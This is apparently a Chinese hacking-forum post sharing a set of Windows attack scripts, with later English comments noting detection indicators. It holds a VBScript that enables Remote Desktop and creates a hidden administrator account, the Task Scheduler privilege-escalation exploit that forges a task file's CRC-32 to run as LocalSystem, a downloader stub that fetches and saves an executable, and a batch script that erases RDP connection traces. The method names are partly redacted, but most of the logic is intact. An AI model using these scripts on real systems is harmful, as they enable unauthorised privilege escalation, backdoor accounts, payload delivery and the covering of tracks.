我知道这里会渗透的绝对不止我一个。。。
' Enables Remote Desktop on the local machine by writing the Terminal Server
' registry values through the WMI StdRegProv provider.
' NOTE(review): "on error resume next" swallows every failure, so the script
' behaves as if it succeeded even when it has no right to write HKLM.
' Detection: writes to HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
' (fDenyTSConnections, PortNumber) made through WMI from a script host.
on error resume next
' StdRegProv hive handle for HKEY_LOCAL_MACHINE.
const HKEY_LOCAL_MACHINE = &H80000002
' "." addresses the local computer.
strComputer = "."
' Object name redacted in this listing (presumably WScript.StdOut); it is not
' used anywhere in this block.
Set StdOut = XXXXXXXXXXdOut
' Registry provider object; the method names on the calls below are partly
' redacted here (presumably CreateKey / SetDWORDValue).
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
XXXXXXXeateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
XXXXXXXeateKey HKEY_LOCAL_MACHINE,strKeyPath
' Dead assignment: strKeyPath is overwritten on the next line before any use,
' so the WinStations\RDP-Tcp key is never created here.
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
' fDenyTSConnections = 0 stops denying Terminal Services connections.
strValueName = "fDenyTSConnections"
dwValue = 0
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' Pins the listener port to the default 3389 in both locations that hold it.
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' Creates a local user and adds it to the local Administrators group through
' the ADSI WinNT provider on the local computer. The name and password are taken
' from the script arguments when any are supplied; otherwise the hard-coded pair
' "$DavieHacker" / "DavieSuper" is used (object and method names are partly
' redacted in this listing; the trailing apostrophe part is a commented-out echo).
' Detection: local account creation via ADSI from a script host followed by an
' Administrators group membership change; the hard-coded default credentials
' are a usable indicator on their own. Errors are again silenced, so a failed
' run leaves no message.
on error resume next
dim username,password:If XXXXXXXXXXXXXXXXXXXXunt Then:username=XXXXXXXXXXguments(0):password=XXXXXXXXXXguments(1):Else:username="$DavieHacker":password="DavieSuper":end if:set wsnetwork=CreateObject("XXXXXXXXXXTWORK"):os="WinNT://"&XXXXXXXXXXXXXputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=XXXXXeate("user",username):XXXXXtPassword password:XXXXXtInfo:Set of=GetObject(os&"/"&username&",user"):XXXXXd(XXXXXsPath)'XXXXXXXXXXho XXXXXsPath
(以上是vbs提权代码,功能是建立一个超级管理员用户并且开启3389端口)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<job id="tasksch-wD-0day">
<script language="Javascript">
// 256-entry lookup table for the table-driven CRC-32 used by calc_crc and
// rev_crc below. The entries match the standard reflected-polynomial table
// (0xEDB88320 is among them). Assigned without var, so it is a global shared
// with the VBScript block of this job.
crc_table = new Array(
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
0x2D02EF8D
);
// Uppercase hex digit alphabet used by dec2hex.
var hD='0123456789ABCDEF';
// Formats the low 32 bits of d as eight uppercase hex digits, most significant
// nibble first. d is consumed with unsigned shifts, so a negative 32-bit value
// is printed in its two's-complement form.
// NOTE(review): h and i are assigned without var and leak as globals.
function dec2hex(d) {
h='';
for (i=0;i<8;i++) {
// Prepend the character for the low nibble (method name redacted in this
// listing; presumably hD.charAt).
h = XXXXXarAt(d&15)+h;
d >>>= 4;
}
return h;
}
// Encodes each character code of str as hex, zero-padded to at least three
// digits. Not referenced anywhere else in this listing, and its three-digit
// per-character output is not the two-digit per-byte form that decodeFromHex
// consumes.
function encodeToHex(str){
var r="";
var e=str.length;
var c=0;
var h;
while(c<e){
// Method name redacted in this listing; presumably str.charCodeAt.
h=XXXXXXarCodeAt(c++).toString(16);
while(h.length<3) h="0"+h;
r+=h;
}
return r;
}
// Decodes a hex string two digits at a time into a string whose character
// codes are the decoded byte values; a trailing odd digit is ignored.
// An identical declaration appears again later in this script block; in
// JavaScript the later declaration takes effect, with no behavioral difference.
function decodeFromHex(str){
var r="";
var e=str.length;
var s=0;
while(e>1){
// Method name redacted in this listing; presumably String.fromCharCode.
r=r+XXXXXXXXXomCharCode("0x"+str.substring(s,s+2));
s=s+2;
e=e-2;
}
return r;
}
// CRC-32 of the bytes encoded in the hex string anyForm: initial value
// 0xFFFFFFFF, one table lookup per byte, final XOR with 0xFFFFFFFF; the result
// is returned as eight uppercase hex digits via dec2hex. The VBScript block
// below uses it on the original and on the patched task file.
// NOTE(review): anyTextString, Crc_value, StringLength, i, tableIndex and
// Table_value are all implicit globals (no var).
function calc_crc(anyForm) {
anyTextString=decodeFromHex(anyForm);
Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
for (i=0; i<StringLength; i++) {
// Method name redacted in this listing; presumably anyTextString.charCodeAt.
tableIndex = (XXXXXXXXXXXXXXXXarCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
Crc_value ^= 0xFFFFFFFF;
return dec2hex(Crc_value);
}
// Given the hex strings leadString and endString and a target checksum crc32
// (hex), computes four filler bytes such that the CRC-32 of
// lead + filler + end equals crc32, and returns them as eight hex digits in
// byte-reversed order. The caller uses it so the edited task file keeps its
// original CRC-32 — a reminder that a CRC detects accidental corruption only
// and is not an integrity control against deliberate modification.
// NOTE(review): crc, anyTextString, Crc_value, StringLength, tableIndex and
// Table_value are implicit globals; `var i` is redeclared three times, which
// is legal in JavaScript but easy to misread.
function rev_crc(leadString,endString,crc32) {
//
// First, we calculate the CRC-32 for the initial string
//
anyTextString=decodeFromHex(leadString);
Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
//document.write(alert(StringLength));
for (var i=0; i<StringLength; i++) {
// Method name redacted in this listing; presumably anyTextString.charCodeAt.
tableIndex = (XXXXXXXXXXXXXXXXarCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
//
// Second, we calculate the CRC-32 without the final string
//
// Target checksum parsed from hex; the loops below walk it backwards over
// endString using signed 32-bit shifts (<<=), so intermediate values may be
// negative — dec2hex's unsigned handling at the end takes care of that.
crc=parseInt(crc32,16);
crc ^= 0xFFFFFFFF;
anyTextString=decodeFromHex(endString);
StringLength=anyTextString.length;
for (var i=0; i<StringLength; i++) {
tableIndex=0;
Table_value = crc_table[tableIndex];
// Linear search of the table for the entry whose top byte matches.
while (((Table_value ^ crc) >>> 24) & 0xFF) {
tableIndex++;
Table_value = crc_table[tableIndex];
}
crc ^= Table_value;
crc <<= 8;
crc |= tableIndex ^ XXXXXXXXXXXXXXXXarCodeAt(StringLength - i -1);
}
//
// Now let's find the 4-byte string
//
for (var i=0; i<4; i++) {
tableIndex=0;
Table_value = crc_table[tableIndex];
while (((Table_value ^ crc) >>> 24) & 0xFF) {
tableIndex++;
Table_value = crc_table[tableIndex];
}
crc ^= Table_value;
crc <<= 8;
crc |= tableIndex;
}
crc ^= Crc_value;
//
// Finally, display the results
//
// Reverse the byte order of the eight hex digits before returning.
var TextString=dec2hex(crc);
var Teststring='';
Teststring=TextString.substring(6,8);
Teststring+=TextString.substring(4,6);
Teststring+=TextString.substring(2,4);
Teststring+=TextString.substring(0,2);
return Teststring
}
// Duplicate of the decodeFromHex declared earlier in this script block, with
// an identical body; being the later declaration, this is the one in effect.
// Decodes a hex string two digits at a time into a string of the decoded byte
// values; a trailing odd digit is ignored.
function decodeFromHex(str){
var r="";
var e=str.length;
var s=0;
while(e>1){
// Method name redacted in this listing; presumably String.fromCharCode.
r=r+XXXXXXXXXomCharCode("0x"+str.substring(s,s+2));
s=s+2;
e=e-2;
}
return r;
}
</script>
<script language="VBScript">
' Entry of the VBScript half of the job. Prints a banner, then registers a
' scheduled task named wDw00t whose action is a file written to the temporary
' folder (GetSpecialFolder(2)); the commands written into that file create a
' local user "test123", add it to Administrators and delete the task again.
' Detection / indicators visible here: task name wDw00t, user test123,
' "schtasks /create" launched from a script host, and a script-written file
' in the temp folder being used as a task action.
' NOTE(review): the text file handle "a" is never closed in this listing.
' There is no "on error resume next" in this block, so any failure aborts.
dim output
' Object name redacted in this listing; presumably WScript.StdOut.
set output = XXXXXXXXXXdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
' Path of the task action file; its file name is redacted in this listing.
biatchFile = XXXXXXXXXXeateObject("XXXXXXXXXXXXleSystemObject").GetSpecialFolder(2)+"\XXXXXXt"
Set objShell = CreateObject("XXXXXXXXXXell")
' Registers the task (monthly schedule) before the action file exists.
XXXXXXXXXXXn "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True
Set fso = CreateObject("XXXXXXXXXXXXleSystemObject")
Set a = XXXXXXeateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")
' Reads the whole of strFileName as a binary byte array through a stream
' object (class name redacted in this listing; adTypeBinary = 1 is the
' ADODB.Stream binary type constant).
' NOTE(review): the stream is never closed.
Function ReadByteArray(strFileName)
Const adTypeBinary = 1
Dim bin
Set bin = CreateObject("XXXXXXXXream")
bin.Type = adTypeBinary
bin.Open
bin.LoadFromFile strFileName
' Method name redacted; presumably bin.Read (whole stream).
ReadByteArray = XXXXXXad
'output.writeline ReadByteArray
End Function
' Converts a byte array (or, via LenB/MidB, the raw bytes of a VBScript
' string) to an uppercase hex string, two digits per byte.
' The loop starts at byte 3, so the first two bytes are always skipped; the
' callers below re-prepend "FFFE" (and, for the schtasks output, "3C00")
' themselves.
Function OctetToHexStr (arrbytOctet)
Dim k
OctetToHexStr = ""
For k = 3 To Lenb (arrbytOctet)
' Right("0" & Hex(...), 2) zero-pads single-digit values.
OctetToHexStr = OctetToHexStr _
& Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
Next
End Function
' Path of the registered task's definition file under System32\Tasks; every
' read and write below targets this file directly.
' Detection: direct writes to %SystemRoot%\System32\Tasks\wDw00t by a script
' host, a leftover wDw00t.xml in the working directory (never deleted here),
' schtasks /change and /run on wDw00t, and a task whose Author/UserId claim
' LocalSystem (S-1-5-18) although it was registered by an ordinary user.
strFileName="C:\windows\system32\tasks\wDw00t"
' CRC-32 of the original task file (OctetToHexStr drops its first two bytes).
hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 original: "+crc32
Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'XXXXXXXXXXXn "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'XXXXXXXXXXXn "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
' Export the task XML through schtasks and join its stdout lines (ReadLine
' drops the line breaks). strLine is never initialised; Empty concatenates
' as "". Object/method names are partly redacted in this listing.
Set objShell = XXXXXXXXXXeateObject("XXXXXXXXXXell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")
Do Until XXXXXXXXXXXXXXXXXXXXXXXEndOfStream
strLine = strLine & XXXXXXXXXXXXXXXXXXXXXXXadLine()
Loop
' Re-encode as UTF-16LE hex with a BOM; OctetToHexStr skipped the first
' character, so "3C00" (presumably the leading "<") is re-added by hand.
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
' Write the bytes to wDw00t.xml in the current directory and load it.
Set ts = XXXXXXeatetextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
XXXXXose
xmlDoc.load "wDw00t.xml"
' Rewrite the task principal to Local System and save straight over the task
' file (method name redacted; presumably xmlDoc.save).
Set Author = XXXXXXXXXlectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = XXXXXXXXXlectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
XXXXXXXXXve(strFileName)
' Re-read the modified file and ask rev_crc for four filler bytes that bring
' its CRC-32 back to the original value. The filler goes between
' "3C0021002D002D00" and "2D002D003E00" (UTF-16LE "<!--" and "-->"), i.e.
' inside an XML comment — a task XML ending in a comment that holds
' non-text bytes is a tamper indicator in its own right.
hexXML = OctetToHexStr (ReadByteArray(strFileName))
leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes
finalString = leadString+impbytes+endString
' Self-check: the CRC of the patched content is intended to print equal to
' the original one above.
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge
' Write the patched task file back with its BOM.
' NOTE(review): fso is created a second time and "stream" is created but
' never used.
strHexString="FFFE"+finalString
Set fso = CreateObject ("XXXXXXXXXXXXlesystemobject")
Set stream = CreateObject ("XXXXXXXXream")
Set ts = XXXXXXeatetextfile (strFileName)
For n = 1 To (Len (strHexString) - 1) step 2
ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
XXXXXose
' Cycle the task (disable/enable) so the Scheduler re-reads the modified
' definition, then run it.
' NOTE(review): the banner scopes this to Vista/Win7/2008; whether a current,
' patched Task Scheduler still accepts the tampered file cannot be judged from
' this listing — patch status, not the CRC, is the control to verify.
Set objShell = CreateObject("XXXXXXXXXXell")
XXXXXXXXXXXn "schtasks /change /TN wDw00t /disable",,True
XXXXXXXXXXXn "schtasks /change /TN wDw00t /enable",,True
XXXXXXXXXXXn "schtasks /run /TN wDw00t",,True
</script>
</job>
(Windows7-Windows2008提权exp-taskxpl 功能过于和谐,暂不介绍)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
rem Writes down.vbs, a downloader stub: an XMLHTTP GET of an executable from a
rem URL (redacted in this listing) whose response body is saved through a binary
rem stream object (type 1, mode 3) to C:\yueyan.exe; SaveToFile mode 2 overwrites
rem an existing file. Carets (^) escape the quotes for the echo.
rem Detection: a script host creating XMLHTTP followed by a stream SaveToFile
rem of an .exe into the drive root; indicators here are down.vbs and C:\yueyan.exe.
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"XXXXXXXXXXXXXXXXXXXXXt/yueyan.exe^",0:XXXXXXXXnd():Set sGet = CreateObject(^"XXXXXXXXream^"):XXXXXXXde = 3:sGet.Type = 1:sGet.Open():sGet.Write(XXXXXXXXsponseBody):XXXXXXXveToFile ^"C:\yueyan.exe^",2 >down.vbs
(这是一个有着下载者功能的vbs代码)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
@echo off
rem Removes the local traces of outbound RDP (mstsc) sessions: the client's
rem registry key under HKCU and the user's Default.rdp. Both locations are
rem evidence of lateral movement, and their deletion by a script (reg.exe
rem delete of HKCU\Software\Microsoft\Terminal Server Client, del of
rem Default.rdp) is itself a tamper indicator worth alerting on.
color 0A
title 3389连接痕迹清除 蛋清@F4ckTeam
mode con cols=88 lines=20
rem Prompt y/n; any other answer re-invokes the script via "call %0", which
rem nests a fresh instance rather than looping back to the prompt.
set /p fk= 确定要清空3389连接痕迹吗?(y/n)
if /i "%fk%"=="y" goto y
if /i "%fk%"=="n" goto n
call %0
:y
rem /f deletes the key (the RDP client's connection history) without asking.
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" /f
rem NOTE(review): %HOMEPATH% carries no drive letter, so this path resolves
rem against the current drive.
del /a /f /q %HOMEPATH%\Documents\Default.rdp
echo 命令执行成功,请手动查看是否清除。
pause >nul
:n
exit
(这是一段能够清除连接痕迹的代码,非常实用)
不知道这些内容会不会被和谐